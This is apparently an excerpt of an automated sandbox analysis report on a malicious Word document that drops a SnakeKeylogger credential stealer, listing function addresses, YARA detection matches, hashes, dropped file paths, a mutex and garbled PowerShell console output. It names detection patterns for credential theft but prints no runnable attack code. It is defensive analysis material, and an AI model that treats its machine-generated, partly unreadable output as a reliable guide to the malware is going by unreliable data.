Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A94970		29_2_00A94970
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9AD77		29_2_00A9AD77
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9DD48		29_2_00A9DD48
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9F540		29_2_00A9F540
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9DD58		29_2_00A9DD58
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A912A0		29_2_00A912A0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A952A0		29_2_00A952A0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A932BB		29_2_00A932BB
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A952B0		29_2_00A952B0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A91291		29_2_00A91291
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9E6E8		29_2_00A9E6E8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9E6E0		29_2_00A9E6E0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A932C8		29_2_00A932C8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A972C8		29_2_00A972C8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A972D8		29_2_00A972D8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9E220		29_2_00A9E220
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9CA38		29_2_00A9CA38
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A92E30		29_2_00A92E30
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A96E30		29_2_00A96E30
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A98633		29_2_00A98633
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9CA36		29_2_00A9CA36
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A90E08		29_2_00A90E08
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9FA08		29_2_00A9FA08
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A94E08		29_2_00A94E08
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A94E18		29_2_00A94E18
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9E211		29_2_00A9E211
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A99A68		29_2_00A99A68
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A99A60		29_2_00A99A60
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A98665		29_2_00A98665
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A96E40		29_2_00A96E40
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9B240		29_2_00A9B240
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A98651		29_2_00A98651
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9B250		29_2_00A9B250
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9EBA1		29_2_00A9EBA1
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9D3B8		29_2_00A9D3B8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9EBB0		29_2_00A9EBB0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A93BE9		29_2_00A93BE9
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9A3E8		29_2_00A9A3E8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A95BE0		29_2_00A95BE0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9BBE0		29_2_00A9BBE0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A93BF8		29_2_00A93BF8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9A3F8		29_2_00A9A3F8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A97BF8		29_2_00A97BF8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A98BFF		29_2_00A98BFF
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9D3C8		29_2_00A9D3C8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A91BC1		29_2_00A91BC1
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A95BD1		29_2_00A95BD1
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A91BD0		29_2_00A91BD0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A99F20		29_2_00A99F20
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A91738		29_2_00A91738
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A95738		29_2_00A95738
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A99F30		29_2_00A99F30
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9CF00		29_2_00A9CF00
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9B707		29_2_00A9B707
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A9B718		29_2_00A9B718
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A97761		29_2_00A97761
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A93760		29_2_00A93760
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A97770		29_2_00A97770
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A95748		29_2_00A95748
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_00A93750		29_2_00A93750
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E2C00		29_2_020E2C00
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E5E00		29_2_020E5E00
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E9000		29_2_020E9000
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E7A10		29_2_020E7A10
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E1620		29_2_020E1620
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E4820		29_2_020E4820
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E7A20		29_2_020E7A20
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E9630		29_2_020E9630
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E0040		29_2_020E0040
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E3240		29_2_020E3240
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E6440		29_2_020E6440
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E9640		29_2_020E9640
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E1C60		29_2_020E1C60
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E4E60		29_2_020E4E60
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E8060		29_2_020E8060
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E3870		29_2_020E3870
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E0680		29_2_020E0680
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E3880		29_2_020E3880
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E6A80		29_2_020E6A80
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E22A0		29_2_020E22A0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E54A0		29_2_020E54A0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E86A0		29_2_020E86A0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E0CC0		29_2_020E0CC0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E3EC0		29_2_020E3EC0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E70C0		29_2_020E70C0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E8CD0		29_2_020E8CD0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E28E0		29_2_020E28E0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E5AE0		29_2_020E5AE0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E8CE0		29_2_020E8CE0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E1300		29_2_020E1300
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E4500		29_2_020E4500
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E7700		29_2_020E7700
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E2F20		29_2_020E2F20
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E6120		29_2_020E6120
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E9320		29_2_020E9320
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E1940		29_2_020E1940
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E4B40		29_2_020E4B40
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E7D40		29_2_020E7D40
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E3550		29_2_020E3550
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 29_2_020E0360		29_2_020E0360

Source: tmpD135.tmp.10.dr

OLE indicator, VBA macros: true

Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: tmpD135.tmp.10.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F4A4ED3.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\swagodi[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: swagodi[1].scr.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: swagodi78811.scr.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gRpkBp.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	Security API names: _0020.SetAccessControl
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	Security API names: _0020.AddAccessRule
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	Security API names: _0020.SetAccessControl
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	Security API names: _0020.AddAccessRule
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	Security API names: _0020.SetAccessControl
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	Security API names: _0020.AddAccessRule
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, FUjasOohxIjsRf91GS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, FUjasOohxIjsRf91GS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, FUjasOohxIjsRf91GS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: taskeng.exe, 00000015.00000002.663024979.0000000001DAB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: .VBp/

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@25/31@68/10

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$der072724.docx.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Mutant created: \Sessions\1\BaseNamedObjects\eHfEjmAxzKFnFihZXpoZa

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7C40.tmp

Jump to behavior

Source: order072724.docx.doc

OLE indicator, Word Document stream: true

Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................L.......1B.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................L.......=B.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................PB.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................\B.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................nB.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................{B.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n................................B.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................B.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........B.........................s.................... .......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................L........B.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................B.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................B.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......B.........................s....................$.......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................B.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................C.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................C.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................4C.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................FC.........................s....................l.......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................RC.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............................eC.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................qC.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l................D.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l..............."D.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l...............4D.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l...............@D.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l...............RD.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l...............^D.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n.......d.......l...............pD.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l...............|D.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........D.........................s.............."..... .......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l................D.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l................D.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l................D.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......D.........................s..............".....$.......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l................D.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l................E.........................s............................................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l................E.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............".....2.......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l...............7E.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l...............IE.........................s....................l.......................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l...............UE.........................s..............".............................			Jump to behavior
